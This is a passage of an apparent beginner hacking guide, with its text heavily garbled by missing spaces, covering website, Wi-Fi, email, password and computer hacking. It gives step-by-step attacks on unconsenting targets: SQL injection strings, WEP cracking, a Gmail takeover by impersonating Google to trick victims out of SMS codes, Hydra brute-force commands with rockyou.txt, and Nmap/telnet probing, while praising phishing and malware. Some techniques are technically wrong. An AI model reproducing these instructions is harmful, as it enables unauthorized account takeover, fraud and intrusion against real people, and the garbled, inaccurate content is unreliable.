Websitesareopendoors to theworldof informationand technology,billionsofpeopleusethemdailytomaketheirlifeeasierandalotofpeopledotheiractivityonwebsites.Websitehackingmeanstotakeauthorityfromtheauthorizedperson,whichmeans that you are controlling the website and after you break into thewebsiteyouwillbeabletodosomeactivitiessuchaspostingmessagestothesite,modifytheinterfaceofthewebsiteandbasicallychangeanythingyouwantonthatwebsitebutyouhavetorememberthatitdependsfromwebsitetowebsiteandthatisduetotheirsystemsinuse.YoucanbecomeawebsitehackerifyouhaveknowledgeaboutHTMLandJavaScriptatamediumlevelandwithsomeexercisingyoucanbecomearealproinwebsitehackingsbecausetherearealotoflow-securedwebsitesyoucanbreakintousingHTML.Thisisthekindofsimpleattackyoucanmakebecausewebsiteswithcomplexsecuritydetailswon’tgiveupinfrontofthismethod,butIhighlyrecommendstartingwiththiskindofwebsitehackingbecauseit’soneoftheeasiestwaysyoucanhackawebsite.

So, if youchoose thismethodyoushouldbeforeanythingelseopen thewebsiteyouwanttohackandenterawrongcombinationofusernameandpassword/exusername:You,password:1=1or“and‘/,afterthatthewebsitewilldelivertoyouamessagesayingthereisanerrorandtheoperationcan’tbeperformed,getreadytohandlethefunnow.Clickrightinanyplaceonthatpagewhichshowsyouthereisanerrorandthenselectgotoviewsourceoptionandthewebsitewillletyouseethe source code, there is where themagic happens because you can theHTMLcoding with JavaScript and it will appear something like <_form action=”…Login….”>butbeforethislogininformationdon’tforgettocopytheURLofthesiteyouwanttohack.Stepfourneedsasmallquantityofattentionbecauseyouneed tobe very careful, all thehackoperationdependson this, andyou shouldefficiently remove the java script code that is validatingyour information in theserver. After this, you must give a look to <_input name=“password”type=“password”>andputinplaceof<_type=password>thiscode<_type=text>and check out if maximum length of password is smaller than 11 and if it isincreaseitto11afterdoingthisyoumustgotofile,selectsaveandsaveitwhereyou have free memory on your hard disk using the extension “.html” / ex.:c:\eleven.html/,movetothenextstepbydoubleclickingthefileyoujustmadeonyourharddiskrecentlyandthiswillreopenyourtargetwebsite,don’tgetscaredifyouwillnotifysomechangesincomparisonwiththeoriginalpage.Afterdoingtheentirestepspleasemakesureyoumadeitintherightwayandenterthetargetwebsite and provide any user name and password. Congrats! You have justcrackedyour targetwebsiteandbroke intotheaccountofListusersavedintheserver’sdatabase.

There is anothermethodusedbyhackers tobreak intoawebsiteand it’s calledInjectionAttack,aninjectionattackistakingplacewhentherearedefectsinyourSQL libraries, SQL Database and sometimes it could be the operating systemitself. Employees usually open apparent believable files which are containing

hiddencommandsand injections,withoutknowingthis.This is theway they letthehackersgetunauthorizedaccesstoprivateinformationjustlikefinancialdata,credit card numbers or social security numbers. I am going to show you aninjectionattackexamplebelow: InjectionAttacks couldhave thenextorder lineString query = “SELECT * FROM accounts WHERE custID=’” +request.getParameter (“id”) +”‘”; to make the hacking operation succeed youchange the ‘id’ index in your browser to send ‘or ‘1’=’1 and in thisway youwillreturnalltherecordsfromtheaccountsdatabasetoyou.

Ofcourse thereareothermethodsyoucanuse tohackawebsite suchasPortalHacking (DNN) Technique; thismethod also takes advantage in Google searchengine to find easy-to-hack websites. If you choose this method you shouldremember that here you can hack a website only using Google Dorks orattempting to a social engineering attack which happens when you giveinformation to “trustable sources’’ like credit card numbers or via onlineinteractionssuchassocialmediasitesandemailsandthehackishappeningwhenyougetintowhatyoudon’texpecttogetinto.AnotherwayhackersbreakintoawebsiteisaDDoSattack-ADistributedDenialofServiceattackiswhenyoutrytomakeaserviceunavailablebyaccessingitfrommultiplesourcesgeneratingabigtraffic,it’sliketakingthewaterfromyouwhenyouareinthemiddleofthedesertwhere you need it most. The hack could be temporally by making the websiteinaccessible forashortperiodof timeor itcouldbeahack thatshutsdownthewholerunningsystem.DDoSattacksaremadebydeliveringabignumberofURLrequests to the targetwebsite in theshortest timepossibleand this is causingaCPUrunoutof resourceswhich is the resultofbottleneckingat theserver side.Cross site scripting attacks, Cross site request forgery attacks and Clickjackingattacksareusedbyhackersusuallytoreachtheirgoal.

EthicalHacking

AsImentioned,respectisveryimportantinthevirtualworldbecauseit’soneofthe basic features for a good collaboration. If you are going to respect yourself,your customers and everything around you it’s impossible to not get success.Serious business organizations and companies respect their jobs and theircustomersand security is apriority for themespecially in thevirtualworldandthat’swhytheyemployeeethicalhackers,thosehackersbelongtoethicalhackingtypeandtheyarealsoknownaspenetrationtesters.Ethicalhackingisabouthighstandards security systems, hackers are trying to find flaws and weakness in asystembytryingtohackitandthosehackersarehelpingtheiremployerstotestand fix their applications,networksandcomputer system.Ethicalhackersmaingoal is to prevent crackers and black hat hackers get into the system they aretesting.

By adopting this kind of hacking you are combining business with pleasurebecauseyouareexposingyourself tobig challengesandmore than thatyouarealsopaidfordoingit,whatcouldbebetter?It’srightthatyouwon’tgetthesameadrenalineportionyouget incaseyouarenotonethicalhackingbuthackinginthiswayprotectyoufromprisonandit’smakingyouanhonestperson.However,youneedexperience in IT toget inanethicalhackerpositionanda lotofworkbehindyoubecauseyoucan’tjustjumpinandbecomeanethicalhackerasmanypeople believe because you will need IT security degrees and certifications andwithoutexperience it’s impossible toget them.Ifyouwant tostartasanethicalhackeryouneedtofollowfewsteps:

First,IhavetoinformyouthatitdependsonthefieldyouarestudyinginITbutyou should start with the basics and get your A+ Certification and earn a techsupport status anddon’t forget that someexperience is alwayswelcomed so it’sbettertohaveadditionalcertificationssuchasNetwork+andCCNAandafteryouget themyoushould increaseyourstatusandmoveup toadminrole.Next,youshouldinvestsometimeintogettingsecuritycertificationslikeTICSA,CISSPandSecurity+andprogressinyourcareerbytakinganinformationsecurityposition.Afteryou’vegotyourpositionit’srecommendedtofocusonpenetrationtestingandexperiencethetooloftrade.ThenextstepisgettingeCertifiedEthicalHacker(CEH)certificationofferedbytheInternationalCouncilofElectronicCommerceConsultants(EC-Councilforshort)andthelaststepafteryouhavegotalltheaboveisrecommendingyourselfasanethicalhacker.Don’tforgetabouttheprogramminganddatabasessuchasSQL!Youwillalsoneedgoodcommunicationskills,fastproblemsolvingskillsandastrongworkethicbecausehackingisn’talltechnicalandyouhavetobepoweredbyyourownmotivationanddedication.Legalityisanotherimportantaspectweshouldtakeinconsiderationifwetalkaboutethical hacking because you aren’t legal anymore if you attacksomeone’snetworkwithouttheirfullpermission,therearesometestsyouwillbeunderifyoutakethisjoblikepolygraphtestsandbasicbackgroundtests.It’sonlyone code from legal to illegal so be very careful because getting into black hat

hacking will totally destroy your ethical hacking career, stay away from illegalactivitiesasmuchasyoucan.

I have to pick your attention again about becoming a Certified Ethical Hacker(CEH)becausethiscertificationisveryimportantandhelpfulinthesametime,itwill setyourmindandmake itahackermindbyhelpingyouunderstandbetterwhat security is about. They will teach you the most used types of exploits,vulnerabilities, and countermeasures. After getting the certification you will beable to do operations like cracking wireless encryption, creating Trojan horses,backdoors, viruses, andworms and youwill find out how to hijackweb serversandwebapplicationsdespitethefactthatyouwillbeaproinpenetrationtesting,social engineering and footprinting. Furthermore, you can take online trainingandcourses liveandyoucanworkwithself-studymaterialsbut inadditionTheEC-Councilrequiresaminimumoftwoyearsofinformation-securityexperience.OneofthemostpopularfiguresinethicalhackingisAnkitFadia,anIndianethicalhacker and he has written over ten books about computer engineering andhackingandthefirstonewaswrittenwhenhewasonly15years,thosebooksarehighly appreciated by professionals. Fadia is currently working as a computersecurityconsultant.Another famousIndianethicalhacker isRahulTyagiwho isanactorandhackeratthesametime.

Networkhackingisanothercommonusedtypeofhackinganditbasicallymeansassembling informationaboutsomethingbyusingtoolsandPortScanning,PortSurfing and OS Fingerprinting by using another tools. Tools usually used innetworkhackingarePing,Telnet,NslookUp,Tracert,Netstat,etc.Pingisusedtorepair TCP/ IP networks and it’s a part of ICMP- Internet Control MessageProtocol,Pingisanorderthatmakesyouabletotestifthehostisdeadornot.Tousepingonaparticularhostsyntax is looking like thisc :/>pinghostname.comandlet’stakeasanexampleGoogle:c:/>pingwww.google.comandthecommandpromptwillbelikethis:

C:\>pingwww.google.com

Pingingwww.l.google.com[209.85.153.104]with32bytesofdata:

Replyfrom209.85.153.104:bytes=32time=81msTTL=248

Replyfrom209.85.153.104:bytes=32time=81msTTL=248

Replyfrom209.85.153.104:bytes=32time=81msTTL=248

Replyfrom209.85.153.104:bytes=32time=81msTTL=248

Pingstatisticsfor209.85.153.104:

Packets:sent=4,received=4,lost=0<0%loss>,

Approximateroundtripstimesinmilli-seconds:

Minimum=81ms,Maximum=84ms,Average=82ms

NetstatshowsyoucurrentTCP/IPnetworkconnectionsandprotocolstatistics.It

can be used with the syntax at command prompt : c:/>Netstat-n and thecommandpromptwilldisplay:

C:\>Netstat-n

Activeconnections:

ProtoLocaladdressForeignaccessState

TCP117.200.160.151:2170209.85.153.104:80Established

TCP117.200.160.151:2172209.85.153.104:80Time_Wait

TCP117.200.160.151:2174209.85.153.104:80Established

TCP117.200.160.151:2176209.85.153.104:80Established

TCP127.0.0.1:1042127.0.0.1:1043Established

TelnetisanothertoolwhichrunsonTCP/IP.It isusedtoconnecttotheremotecomputerorparticularport.Itsbasicsyntaxis:c:/>telnethostname.comandthecomplete syntax when it connects to port 23 of the computer is: c:/>telnethostname.comport.

Example:c:/>telnet192.168.0.521orc:/>telnetwww.yahoo.com21

Tracertisanothertoolusedbynetworkhackersanditstracingouttheroutetakenbythe information.Tracertsyntax:c:/>tracertwww.hostname.comlet’stakeasexamplewww.insecure.in:

C:/>tracertwww.insecure.in

Commandpromptwilldisplay:

C:\>tracertwww.insecure.in

Tracingroutetoinsecure.in[174.133.223.2]

Overamaximumof30hops:

129ms30ms29ms117.200.160.1

231ms29ms29ms218.248.174.6

3***Requesttimedout

4694ms666ms657ms125.16.156.17

5644ms656ms680ms125.21.167.70

6702ms686ms658msp4-1-0-1.r03.lsanca03.us.bb.gin.ntt.net

7682ms710ms703msxe-3-3-0.r21.lsanca03.us.bb.gin.ntt.net

8676ms692ms707msas-0.r21.hstntx01.us.bb.gin.nnt.net

9748ms837ms828msxe-4-3.r03.hstntx01.us.bb.gin.nnt.net

10717ms721ms722msxe-4-4.r03.hstntx01.us.ce.hin.nnt.net

11695ms701ms712mspo2.car07.hstntx2.theplanet.com

12726ms697ms688ms2.df.85ae.static.theplanet.com

Tracecomplete.

NetworkHacking

Despitethehackers,thereare“occasional”hackerswhoareusingthenetworkhackingtocrackwirelesspasswordsbecauseinternetconnectionsareanecessityinourlivesbuthowisawirelessnetworksecured?Incaseofsecuredwirelessconnections,encryptedpacketsrepresentinternetdataunderanotherform.Packetsareencryptedwithnetworksecuritykeysandbasicallyifyouwanttohaveaccesstointernetwirelessconnectionthenyoushouldhavethesecuritykeyforthatparticularwirelessconnection.Therearetwotypesofencryptions in useWEP(WiredEquivalentPrivacy)andWPA(Wi-FiProtectedAccess),WEPisthefundamentalencryptionandaverysmallnumberofpeopleuseitbecauseit’sveryunsafeanditcanbecrackedveryeasy.WPAisthemoresecureoption,WPA-2isthemostsecureencryptionofalltimeandyoucancrackaWi-FiProtectedAccessnetwork then you will need a wordlist with common passwords but it can beunbreakableiftheadministratorisusingacomplexpasswordandbecausealotofpeopleareinterestedinbreakingWi-Fiprotectedconnections,thisbookisgoingtoshowyouhowtodoit.Youwillneedacompatiblewirelessadapter,CommViewfor Wi-Fi, Aircrack-ng GUI and a big bag full of patience. This operation isimpossible without a compatible wireless adapter, your wireless card must becompatiblewiththesoftwareCommView,softwareusedforcapturingthepacketsfromthenetworkadapter,andyoucandownloadthesoftwarefromtheirwebsite.Aircrack-ngGUIispracticallydoingthecrackaftercapturingthepackets.

Don’tforgettwomainthingsbeforestarting:selectthenetworkwiththehighestsignalandrememberthateverynetworkhasitsdetailsintherightcolumn,notintheleftcolumn.SetupCommViewandchooseyourtargetnetwork,selectitanddouble click on “capture”withCommView and the softwarewill start collectingpackets fromtheselectedchannel. Ifyouwant tocapturepacketsonly fromthetargetnetworkthenrightclickonthetargetnetworkandcopytheMACaddress,onthetopchangetoRulestab,ontheleftpickMACaddressesandenablethem.

Once you have done this, select the option capture and for ‘add record’ pleaseselect both and paste the copied addresses in the displayed box. Enable autosavingintheloggingtab,setMDS(MaximumDirectorySize)to2000andALFS(AverageLogFileSize)to20.Andyouareatthepointwhereyoushoulduseyourpatienceandwaituntilatleast100,000packetsarecapturedandexportthembygoinginthelogtabandselectingconcatenatelogsandselecteverythingthathasbeen saved anddon’t forget to keepCommViewopen, take awalk to the folderwhereyouhavesavedtheconcatenatedlogsandopenitandclickonFile-Export-Wiresharktcpdumpformatandchoseanydestination,afterdoingthis logswillbesavedwith.capextension.

Next,openAircrack-ngandthereyouwillfindazipfile,extractitandopenitandnavigateto ‘bin’,nowrunthesoftwareandchooseWEP.Rememberthefileyousavedearlier.cap?Click‘launch’andinthecommandpromptwritetheparameternumber of yourdesirednetwork andwait for a few seconds.Enjoy the internet

now!

EmailHacking

Thefourthtypeofhackingisemailhackingandinthistypehackersattempttoanemail address without permission. The electronic mail is more used than thetraditional mail boxes and that’s due to the evolution, emails are used todaymostly as a form of communication due to its options. There are two types ofservicesweb-based:anemailservicewhichisopen-basedandthatmeansthistypedeliver email accounts to any customer, some of them are for free but somerequest feesand theother typegiveemailaccountscontrolledandorganizedbycompanies foremployees,and ingeneralstudentsandmembersonly.Therearethreebigformsofattacks:spam,virusorphishing.

The first type of attack is realized by delivering huge email broadcasts whichcontainsahiddenIPaddressoremailaddresses,aspammessageusuallycontainssomething very attractive such as low-priced travel tickets, job offers and ingeneralanykindofoffersandtobemoreattractivespammersusealotofcolorsandphotos.Someofthehackvictimsmayopenthemagicmessage,readitandgetreallyinterestedinitscontent.

The big fun for hackers iswhen they hit a big company andhold their sendingemailandIPaddress.IfthemastersofemailhackingchooseacompanyandhackitthecompanywouldbedestroyedandtheirinternetconnectionwouldbedownandstoppedbyitsInternetServiceProvider(ISP)andnoneoftheiremailswouldreachthedestinations.

Anothermethodusedbyhackerstogetunauthorizedaccessintosomeone’semailisbysendingthemanemailthathidesavirusinthebackground,theSobigvirusis often used because it’s a modern technology that creates a spamminginfrastructure because it’s taking over unwilling PC members. The third wayhackers follow to hack and email is called phishing and it consist of collectingsensible and valuable information from others emails such as credit cardnumbers, user names and passwords andmany hackers use thismethod to getmoney.TheriskofbeinghackedbyphishingisveryhighinthosedaysespeciallyonFacebookandTwitterwhereyougive someprecious informationabout yourperson,socialmediaisnotaskindasitseemsandtherearealotofwellhiddensecretsbehindthem.

Therearethreetypesofphishing,thefirsttypeisknownasSpearPhishingandit’sused toattack targetpeople, companiesandorganizations,91%of email attacksaremadewith this kind of phishing andmost of them are successful. The nextphishing type is called Clone Phishing and its adepts clone emails by creatingidenticalonesandthelasttypeofphishingisknownasWhaling,peopleusethistermtodescribeahighprofileattackmadeusingphishingmethod.

An interesting way to hack someone’s account you can apply only by knowinghis/herphonenumber,letmeexplainhow,whenapersonismakinganewemailaddressitsrecommendedtoattachtheirphonenumberforsecurityreasonsand

in case you forget your email password you can set a new one if you add yourphone number, somost of the people add their phone numbers. It’s enough toknowyourvictim’sphonenumberandemailaddresstostart.

First,gototheloginpageandtypetheemailwheretheyaskyoutodoitandafterthat select the ‘’need help?’’ option and select “Get a verification code on myphone: [mobilephonenumber]”and thesmswillbesent to thephonenumber,thesmsusuallyisformedfromsixletters.Afterthat,youshouldsendamessagetothe person’s number pretending you are Google and the message should be“Google has detectedunusual activity on your account. Please respondwith thecode sent to your mobile device to stop unauthorized activity.” the victim willbelievethismessageandsendyoutheverificationcodewhichyouwillenterlately.Afterenteringthecodesetupanewpasswordandwearedone,checkeverythingyouwantonthataccount.

*Note:thismethodworksonlywithGmailaccountsanditwillbesuccessfulifthevictimdoesn’tknowyournumber,incasethenumberisknownbythevictimtrytosendthemessagefromanunknownnumber.

Everyoneofusmusttakemeasuresimmediatelytoprotectouremailaddresses,abigcompanylikeYahoo!,GmailorHotmailtreattheircustomerswithcuriositybyofferingthemhighsecurity,eachoneofthemwillnotifyyouimmediatelyifthereissomethingstrangeandaskyoutocheckyouremailorsetupyourpassword.

Anothergoodideaistomakeacomplicatedemailaddresswithnumbersbutmakesureyoudon’tforgetit!Alsoyoushouldchooseacomplexpasswordwithnumbersandbig and small letters (I recommendcreating apasswordwithmore than 12characters). Your computer should be protected as well, make sure you get aprofessional,originalandhighqualityantivirussoftwarelikeAviraorAvast,theymightofferyouashorttestingperiodandafterthattheywillaskyoutobuyit,doit,ittotallyworth!Evenahackershouldprotecthiscomputerbecauseyouneverknowwhatcouldhappeninthenextsecond.

Choosing a difficult security question will increase your security rate but becareful; you should remember the answer even after ten years or more if it’sneeded,thisoptioncouldsaveyouremail’slifebecausenoonewillbeabletosurftheinternetinhopetofindsomethingverypersonalaboutyou.

However, email hackers have a lot of success those days by simply getting intomoreandmoreemailaccounts….

PasswordHacking

Another typeofhacking ispasswordhackingandsomeof thepeoplealsocall itpasswordcracking,thehuntedpeopleareusuallycelebrities,governmentpeopleor‘’tooloved’’personsortheycouldbesimplepersonswhoforgottheirpasswordsand want them back so they recover them by hacking their own accounts. Apassword hacker is using all his intellectual and practical power to solve theproblem and not by guessing the password because this is something that anunspecialized person would do, not amaster of hacking. So do you think yourpasswordissecure?Thinkagainaboutthis.

So, password hacking is a method to recover your own password from datatransmitted by or stored on a computer, or you it can be a method to getsomeone’selsepasswordwithoutaskingforit.Infact,passwordhackingisaboutyou passwords and other’s passwords that protect their important or valuabledata.

Therearesomefamoustechniquestohackapasswordsuchasdictionaryattack,brute force attack, rainbow table attack, phishing is used also here, socialengineering,malware,offlinehacking,spideringandshouldersurfing.Becauseofthe spideringmethod hackers gave a small piece of their time to studywebsitesales material and even the websites of competitors and corporate literaturebecause theyreleased thatpasswordsarecombinationsofwords linked to thosedomainssotheygotinspiredandcreatedapersonalizedwordlisttoletthemgetaccess to the secured information easier. The other hackerswhodon’t have toomuch time to spend reading, there is an application that can do that replacingyourwork.Dictionaryattacksarebasedonmostusedwordsaspasswordsandthismethod is using simple files which contain words that can be found in adictionary.

If you are going to hack by rainbow table attack you will need a lot of RAMbecausethefile isaboutfourGigabytes(GB),arainbowtable isapre-calculatedlist of hashes and is working by listing permutations of encrypted passwordsspecific toagivenhashalgorithm.Thismethod isoneof the fastestmethodsofhacking because in average is only 160 seconds to break a 14-characteralphanumericpassword,butdon’tforgetthatabigpartoftheprocessdependsonthe software.As in emailhacking,phishing isused inpasswordhackingaswellbecause it’soneof theeasiestways tohackbysendinganemailunderdifferentinstitution’s identitiesasking themtogiveyoutheirpassword,andyouhavebigchancestowinifyouaregoingtochoosethismethodofhacking.Evenmorethanthat, there is a social engineeringwhich is taking theabove conceptoutside theinbox,youwouldbereallysurprisedhowmuchthisworkstheonlythingyouhavetodoistoposeasanITsecurityagentandsimplyaskforthepasswordsunderafake identity of course, some of the hackers do this face to facemaking a falseidentitydocumentbefore.

Bruteforceattacksarealsoknownasexhaustivekeysearchandtheyareattacks

against encrypted data but an exception is data encrypted in an information-theoretically securemanner, thismethod is similar to dictionary attackmethodand it’s not a quick way to hack a password, it’s a greatmethod to hack shortpasswordseveniftheyhavegotnumbersinthembuttherearesomeencryptionsthat couldnot be givenupbybrute forcedue to theirmathematical proprietiesand complicated algorithms. You can use software such as Hashcat, John theRipper, Aircrack-ng, Cain and Abel, Crack, SAMInside, Rainbowcrack,L0phtcrack,Hashcodecracker,DaveGrohlandOphcracktohackpasswordswiththismethod.

AndhereisanexampleusingHydra:

root@find:~/Desktop#hydra-t10-V-f-lroot-x4:6:aftp://192.168.67.132

Malwareissuchagreatandenjoyablemethodtohackpasswordsbecauseit’snottakingabiamountofeffort,malwarecaninstallkeyloggersorscreenscrappersthat collects everything youwrite and if youwant to it canmake print screenswhileapersonislogginginandthensendsbyforwardingacopyofthefiletoyou.A recent research is showing that over 45,000 Facebook accounts have beenhackedusingmalware.Malware is greatbecausedespite the fact that ishelpingyouhackapassworditcandisruptcomputeroperationsandwinaccesstoprivatecomputersystems.Malwareisthecontractionformalicioussoftware.

Shoulder Surfing it is the most used method to collect pass codes from ATMmachines and credit cards and it is realized running your eyes over a person’sshouldertovisuallycollectwhatthatpersonistyping.

Offlinehackingisalsoanicemethodtohackpasswordsusedbyhackers,hackerscan take full advantage of thismethod because they can do it in a really quicktime,byusingthismethodyouwillbeabletotakethepasswordhashesoutofthelocal SAM file and hack the selected hashes using methods like Dictionary orRainbowtablebuttobecapableofdoingthisoperationyoushoulddownloadandinstallCainandAbelsoftware.Thiskindofattackisonlypossiblewhenyouhavethepasswordhashesanditswaymorewellthanonlineattacksduetothemaindifferencebetweenthemwhichisthespeedyoucanhackapassword.

Just to get some training I recommend trying both online and offline attacksbecausetheyareverydifferentandifyouaredoingitforthefirsttimeitcouldbeoneofyour lifechallenges.Sometimesyouwon’tget theresultyouwanttoonlytryingonce,butnevergiveupandthinkaboutthebestsolutions!Makesureyouhave all the comfort conditions youneedwhen youdo suchoperationsbecausetheyneedalotofpatienceandattention.

Let’smakeanimaginationexerciseandbelieveforamomentthattherearen’tanypasswordstobreakandeverythingisfree,wouldn’titbetooboring?

Thoseskillswillhelpyoureachyourgoalsanditisfuntotryeachoneofthem.

Butifyouwantsomethingmoreprofessionaltohackapassword,thenthisbookistherightoneforyoubecausebelowyouwillfinouthowtohackapasswordusingTHC-Hydrabutyouwillneed todownloadandrunKalidistribution inorder togetthistoolinstalled.

The first step in hacking passwords using THC-Hydra is downloading andinstalling another tool which is an extension of Firefox and it gives you thecapability to keep and/or change the outgoing HTTP requests and it is called“TamperData“,itwasoneofthebesthiddensecretsofthehackers…untilnow,thistooliseasytousebecauseitiswellbuiltanditallowsyoutopostinformationtoo.After youdownload it please install it into Iceweaselwhich is a browser inKali.

Onceyoudotheabovecarefully,pleasemovetothenextstepbytestingTamperData by activating the tool into your browser and start surfing the internetrandomly. Tamper Data must provide you with each HTTPS GET and POSTrequestbetweenyourbrowserandtheserver,ifthetoolisdoingthisthenyoucansuccessfullyfollowthenextstep.

The next step consists in opening THC Hydra after you installed and testedTamperData, youcanopenHydrabyaccessingKaliLinux, selecting theoptionpassword and the computer will display OnlineAttacksoption,clickonitandselectHydra.

Once you openHydra, you can noticeHydra’s syntax root@kali:~# ,Hydrawillwelcomewithahelpscreenwhichlookslike:

OPTsomeservicemodulessupportadditionalinput(-Uformodulehelp)

Supportedservices:asteriskafpciscocisco-enablecvsfirebirdftpftpshttp[s

]-{head|get}http[s]-{get|post}-fromhttp-proxy-urlenumicqimap[s]irc

ldap2[s]ldap3[-{cram|digest}md5][s]mssqlncpnntporacle-listenerora

cle-sidpcanywherepcnfspop3[s]postgresrpdrexecrloginrshs7-300sipsmb

smpt[s]smtp-enumsnmpsocks5sshsshkeysvnteamspeaktelnet[s]vmauthdvncxmpp

Hydraisatooltoguess/crackvalidlogin/passwordpairs–usageonlyallowed

forlegalpurpose.ThistoolislicensedunderAGPLv3.0.

Thenewestversionisalwaysavailableathttp://www.thc.org/thc-hydra

Theseserviceswerenotcompiledin:sapr3oracle.

Use HYDRA_PROXY or HYDRA_PROXY – and if needed

HYDRA_PROXY_AUTH–environmentforaproxysetup.

E.g.:%exportHYDRA_PROXY=socks5://127.0.01:19150or(socks4://orconnect://)

%exportHYDRA_PROXYHTTP=http://proxy:8080

%exportHYDRA_PROXY_AUTH=user:pass

In Hydra, the username can be “user” or “admin” or maybe “person”, theusername is a singlewordusually andpasswordlist is a file that it’s containingpossiblepasswordsandtargetindicatestheIPaddressandport.

AndthelaststepisusingHydratohackpasswordslikeinthefollowingexample:

root@kali:/usr/share/wordlists#hydra–ladmin-p/usr/share/wordlists/rockyou.txt192.168.89.19080

AboveIjusthackedthe‘admin’passwordusingthewordlist“rockyou.txt”at192.168.89.190port80.

TakefulladvantageofusingHydraanduseitonWebFormstoo,Hydra’ssyntaxusingaweb formis<url>:<formparameters>:<failurestring>andTamperDatawillhelpyoubyprovidingimportantinformation.

*Note:UsefulHydradictionary:

-t=howmanyparallelattemptatamoment(1/5/10/100?)

-P=dictionaryfile

-f=stopwhenfoundthepassword

-v=showoutput

-I=username

There are other famous tools used for password hacking except the onementioned, tools such asMedusa,Wfuzz andBrutus.Brutus is one of themostused tools forpasswordhackingbecauserecentstudiesareshowing that it’s themost flexible and the fastest tool used in this type of hacking, only works onWindowssystemanditisonmarketsinceOctober,2000anditistotallyfree.

MedusaissimilartoHydraandit’ssupportingHTTP,FTP,CVS,AFP,IMAP,MSSQL, MYSQL, NNTP, NCP, POP3, PostgreSQL, pcAnywhere, rlogin, rsh, SMB,SMTP,SNMP,SSH,SVNandVNC.This tool is capable to check approximately2000passwords perminute if the network connectivity is good, but before youstartusing it takeaclose lookto thecommandsbecausethis isacommand linetoolandtrytolearnthem.

Wfuzzisalsoatoolusedbypasswordhackerswithbruteforce,youcanuseittodiscoverhiddensourcessuchasscriptsandservlets.Wfuzzisalittlebitdifferent

because it has the capability to identify injections like SQL Injection, LDAPInjectionandXSSInjection.WhytochooseWfuzz?It’ssimple,youshouldchooseitforthosereasons:

ItcanbruteforceHTTPpassword,ithasmultipleproxysupport,itcaninjectviamultiplepointsandpostheadersandauthenticationdatausingbruteforce.

Each of thementioned tools are great and helpful in password hacking, a realhacker must try them all and then choose a favorite tool to use in his nextpasswordhackingattacksbecauseeverytoolisspecialinadifferentwayandeveniftheyseemtodothesamethings,ifyougivesometimetotryandanalyzeeachofthemyouwillseethattheyaredifferentfromeachotherevenifthemainideaispracticallythesame,theywereallcreatedtodothesamething:tohelphackersdotheirjobbetter.

Investinginyourpersonisthebestkindofinvestmentyoucouldevermakeandthat’sbecauseyouarealwaysgainingsomethingthatyoucanloseafteraperiodoftime, you gain experience and you exercise your brain at the highest levels bytryingeverynewfeatureandexploringit,bymakingnewconnectionsandcreatingnewsolutions.

Also,ahackerknowsmostlyeverythingaboutallthetypesofhackingsohepreferqualityoverquantityandisalwaysinvestinginnewhighstaplesoftwarethathecan’twaittoexplore,findthesoftwareweaknessandmakeitevenhigherqualitythanbeforebecauseevolutionisinfinite.

ComputerHacking

Thepenultimate typeofhacking is representedbyComputerhackingwhich isatypeofhackingusedbyhackers togetaccess toanotherperson’s computerandcontrol itwithouttheownerpermissionandtherearefewoperationsperformedonthehackedcomputerlikecollectingmaterialorusingittochatandevenaccesssomesensitivefilesonthatcomputer.

Computer hacking is about changing the hardware and software on the hackedcomputer,reportsshowthatmostofthecomputerhackersareteenagersandveryyoung adults but there are aswell old agedhackers, as any other hacking type,computerhackingisconsideredbyhackersaformofartanditnotanopportunityto bother others asmany people see, in fact, computer hacking is a chance forhackerstoprovetheirabilitiesandskills.

Therearefamouscomputerhackersandweshouldthankthemeverydayfortheirrealizationsbecauseiftheyweren’tmaybethetechnologynowadayswon’tbeatthispoint,DennisRitchieandKenThompsonworkedearly in the70’s tocreatetheUNIXoperatingwhichhighlyaffectedthedevelopmentofLinuxandtheyweretaggedasformerhackers.AnotherimportantcomputerhackerisShawnFanningwhocreatedNapster.

Thereare threemethods tohackacomputerand the firstone iscalledHackingLogins, thesecondoneRemotehacksand the thirdone isabouthackingWi-Fi.Therearefewstepstofollowineverycase.

Wearegoingtostartwiththefirstmethodofcomputerhacking,sothefirststepistoopenyour computer andboot it in the safemodeandafterdoing thiswait acouple of seconds until the computer is open, when it’s open in the safemodeplease click on Start button and select “run” after that try to write in “controluserpasswords2”andchangepasswordsforanyotheraccountiftherearemultipleaccounts and at the end of the process don’t forget to restart the fresh hackedcomputer.

The secondmethod is used to hack remotes and the first step in following thismethodofcomputerhackingisdownloadingandinstallingtheLogMeInsoftware,theywillgiveyoua free limitedversion, thisprogramshouldbedownloadedonthecomputeryou intendtoremotelyview.Youhave tomakeanaccounton theLogMeInwebsitetousethefreeprogram.Whenyoualreadyownanaccountonthewebsite,loginandgotothe“MyComputers”pageincaseifitdoesn’topenautomatically after logging in. The next step is searching for “ Add computer”,clickonthisbuttonandputtheretheinformationofthecomputeryouintendtoaccess and the computer should be added automatically. Check if the computernameisaddedandclickonitif it isthere,ifnotthenrepeatthebelowstep.Forthe next step you will have to know the username and the password of thecomputerinordertologonitandviewtheaccountyouwanttoaccessandafterthatselectthe“RemoteControl”optionandlogoutthewebsiteonceyousatisfied

yourcuriosity.

Computerhackersuseanothermethodtogetaccesstoyourcomputeranduseit.The whole process is realized if hackers know your personal Internet Protocolwhich is totallyunique andanyhacker can contact your computer if they knowyourIP.ThefirststepinthiscaseisdownloadingandinstallingNmap,atoolusedforportscanningandafteryouhavegottheNmapinstalledyoushouldsearchbyscan option a local computer and after youdid this please scan your individualtarget,afterthescanyoushouldnoticetheopenports.Thelaststepafterscanningisbannergrabbingandhereyoucanuse the regularol’ telnet client,TelnethasLinuxandmostWindowsdistributions:

telnet<hostIP><portbannertograb>andyoujusttriedthismethodaswell.

Hackersarecreativemindsandlovetosolveproblems,onehackeraskedhimselfiftherewouldbenoproblemsandheendedupconcludingthathewouldcommitsuicide,hackingissoaddictive,onceyougetitright,youneverleaveit.

AmassivecomputerhackwasmadebyAnonymousin2011whentheybrokeintotheSyrianLeader’saccountandaccessedmorethan78inboxesofthepresident’spersonalandmadeitpublicandaccessibletoanyperson.Accordingtotheofficialsources, thehackersgroupdidn’tneeda lotofeffort tobreak theemailbecausethe president’s password is number two weakest password in the world on anofficial top, his passwordwas 12345 and it was associated with a couple of hisaccounts not only the official one, while the country was on fire, hot newsappearedduetotheAnonymousgroupofhackers.

The black hat hackers who have big goals such as Anonymous goal that laterturned into a big realization aremore than dangerous because by contributingwith their creativemind, theyhave90%chances to succeedbut there is95% tomake other collateral victims of the hack, so think ten times before you takeattitude and action as a hacker because you might destroy other people livesincluding your life as well, once you take a decision and you realize what youdecideyoucan’teraseyourownactions, it’sexactly liveafamousmovie,onceisfilmeditisneverdeleted.

